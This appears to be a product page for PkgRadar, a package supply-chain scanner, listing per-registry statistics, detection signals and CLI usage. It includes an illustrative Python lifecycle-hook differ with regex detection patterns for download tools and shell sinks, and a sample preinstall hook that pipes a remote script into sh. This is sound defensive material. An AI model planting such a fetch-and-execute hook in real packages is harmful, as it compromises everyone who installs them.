PkgRadar

Coverage

Nine ecosystems, one gate.

Every fresh release is scanned, persisted, and clustered against the rest of the corpus the same way regardless of registry. The hunter for each ecosystem runs on a 60-second loop; the CLI auto-detects supported lockfiles in your repo and routes specs to the right scanner.

npm (registry.npmjs.org)
Packages scanned: 483,634 | High risk: 4,569 | Review: 53,806 | High-severity findings: 33,483 | Last scan: 22s ago

JavaScript / Node.js. Largest registry by package count and the most common supply-chain attack target; the scanner covers preinstall hooks, install-time remote payloads, lifecycle-diff vs prior release, and known-IOC filename matching.

Lockfiles: package-lock.json, npm-shrinkwrap.json, pnpm-lock.yaml, +1 more

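The "lifecycle-diff vs prior release" signal above, as an added example that is not PkgRadar's own code: it compares the install-time lifecycle scripts of a new package.json against the prior release, reports hooks that were added or changed, and rates a remote fetch piped into a shell as high risk. The pattern lists and the two sample manifests are constructed for illustration.

```python
"""Lifecycle-hook diff between two npm releases (illustrative, not PkgRadar code)."""
import re

# Hooks npm runs at install time in the consumer's environment.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Remote payload fetch: a download tool or a URL inside the hook command.
REMOTE_FETCH = re.compile(r"\b(curl|wget|iwr|Invoke-WebRequest)\b|https?://", re.I)
# Execution sink: piped into a shell, inline node/eval, or PowerShell IEX.
EXEC_SINK = re.compile(r"\|\s*(sh|bash)\b|\bnode\s+-e\b|\beval\b|\biex\b", re.I)


def lifecycle_scripts(manifest):
    """Return only the install-time hooks from a package.json dict."""
    scripts = manifest.get("scripts") or {}
    return {k: v for k, v in scripts.items()
            if k in LIFECYCLE_HOOKS and isinstance(v, str)}


def diff_lifecycle(prev_manifest, curr_manifest):
    """List hooks that are new or changed versus the prior release."""
    before = lifecycle_scripts(prev_manifest)
    after = lifecycle_scripts(curr_manifest)
    findings = []
    for hook, cmd in sorted(after.items()):
        if before.get(hook) == cmd:
            continue  # identical to the prior release: no diff signal
        fetch = bool(REMOTE_FETCH.search(cmd))
        sink = bool(EXEC_SINK.search(cmd))
        findings.append({
            "hook": hook,
            "change": "added" if hook not in before else "changed",
            "command": cmd,
            # Fetch and exec in one hook is the install-time remote payload pattern.
            "severity": "high" if fetch and sink else "review",
        })
    return findings


# Constructed sample manifests: 1.0.1 adds a preinstall hook that pipes a
# download into a shell, while the existing node-gyp postinstall is unchanged.
PREV = {"name": "demo-pkg", "version": "1.0.0",
        "scripts": {"test": "jest", "postinstall": "node-gyp rebuild"}}
CURR = {"name": "demo-pkg", "version": "1.0.1",
        "scripts": {"test": "jest", "postinstall": "node-gyp rebuild",
                    "preinstall": "curl -s https://example.invalid/i.sh | sh"}}

if __name__ == "__main__":
    for f in diff_lifecycle(PREV, CURR):
        print(f"[{f['severity']}] {f['hook']} {f['change']}: {f['command']}")
```

An unchanged hook produces no finding, so a package that has always run node-gyp in postinstall is not re-flagged on every release.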
PyPI (pypi.org)
Packages scanned: 50,888 | High risk: 3,018 | Review: 10,262 | High-severity findings: 5,498 | Last scan: 24s ago

Python. Source distributions execute setup.py at install time, making it the canonical Python supply-chain surface. Wheels skip setup.py but ship native code; the scanner walks both formats, with a rustpython-parser AST analyzer for source files.

Lockfiles: requirements.txt, requirements.lock, Pipfile.lock, +3 more

RubyGems (rubygems.org)
Packages scanned: 1,814 | High risk: 27 | Review: 189 | High-severity findings: 72 | Last scan: 2m ago

Ruby. C-extension gems run extconf.rb at install time; the scanner only flags a shell-out when it is paired with an eval, network, or deserialize primitive, so legitimate pkg-config / make calls aren't penalized.

Lockfiles: Gemfile.lock, gems.locked

Cargo (crates.io)
Packages scanned: 30,792 | High risk: 257 | Review: 4,089 | High-severity findings: 182 | Last scan: 57s ago

Rust. build.rs runs on `cargo build`; proc-macro crates' library code runs during the consumer's compilation. Detection focuses on Process::Command + network/base64/env-token combos at build time.

Lockfiles: Cargo.lock

Maven (repo1.maven.org)
Packages scanned: 545 | High risk: 0 | Review: 7 | High-severity findings: 1 | Last scan: 9h ago

Java / JVM. Source jars are opportunistically downloaded for static analysis; bytecode-only releases get path + manifest + native-blob signals. Detection targets JNDI lookups (Log4Shell family), Class.forName-based reflection bypass, URLClassLoader.defineClass, and static-init side effects.

Lockfiles: pom.xml

NuGet (nuget.org)
Packages scanned: 35,147 | High risk: 0 | Review: 3,286 | High-severity findings: 0 | Last scan: 30s ago

.NET. The PowerShell hook trio is the canonical NuGet supply-chain attack vector. The scanner covers IEX stagers, hidden powershell.exe spawns, base64 decode combos, Run-key persistence, and CI/CD secret env reads at hook time.

Lockfiles: packages.lock.json, packages.config, project.assets.json

Composer (packagist.org)
Packages scanned: 4,408 | High risk: 148 | Review: 987 | High-severity findings: 404 | Last scan: 39m ago

PHP. composer.json scripts run shell commands during install; PHP source carries the eval/exec primitives. Detection gates on combos: base64/gz/hex decode + eval/exec, remote include/require, the deprecated assert(string) backdoor, and remote-fetch-with-exec chains.

Lockfiles: composer.lock

Go modules (proxy.golang.org)
Packages scanned: 119,029 | High risk: 1,229 | Review: 20,209 | High-severity findings: 629 | Last scan: 39s ago

Go. Modules are immutable in the public proxy, so the supply-chain surface is install-time init() side effects, cgo C code, build-tagged stubs, and `replace` redirects. The scanner is preview-quality: it currently only checks that the module exists on proxy.golang.org; the module zip walk is pending.

Lockfiles: go.mod, go.sum

Pub (Dart), pub.dev
Packages scanned: 2,158 | High risk: 3 | Review: 139 | High-severity findings: 1 | Last scan: 5m ago

Dart / Flutter. Pub packages can ship build_runner code generators that execute at consumer build time, plus dart:ffi native library loads. The scanner is preview-quality: it currently only checks that the package exists on pub.dev; the tarball walk is pending.

Lockfiles: pubspec.lock

Same gate, any ecosystem

One command, every supported registry.

The CLI auto-detects lockfiles in your working directory. For ad-hoc specs the ecosystem is inferred from the version separator; because npm, Cargo, RubyGems, NuGet, Composer, Maven, Go, and Pub all use name@version, set it explicitly with --ecosystem for those.

# Lockfile mode — works for any of the supported formats:
pkgradar gate --lockfile package-lock.json
pkgradar gate --lockfile poetry.lock
pkgradar gate --lockfile Gemfile.lock
pkgradar gate --lockfile Cargo.lock
pkgradar gate --lockfile pom.xml
pkgradar gate --lockfile composer.lock
pkgradar gate --lockfile packages.lock.json
pkgradar gate --lockfile go.sum
pkgradar gate --lockfile pubspec.lock

# Ad-hoc specs — PyPI uses ==, the rest use @ (disambiguate with --ecosystem):
pkgradar gate requests==2.31.0
pkgradar gate --ecosystem maven com.fasterxml.jackson.core:[email protected]
pkgradar gate --ecosystem composer symfony/[email protected]
pkgradar gate --ecosystem go github.com/sirupsen/[email protected]
pkgradar gate --ecosystem pub [email protected]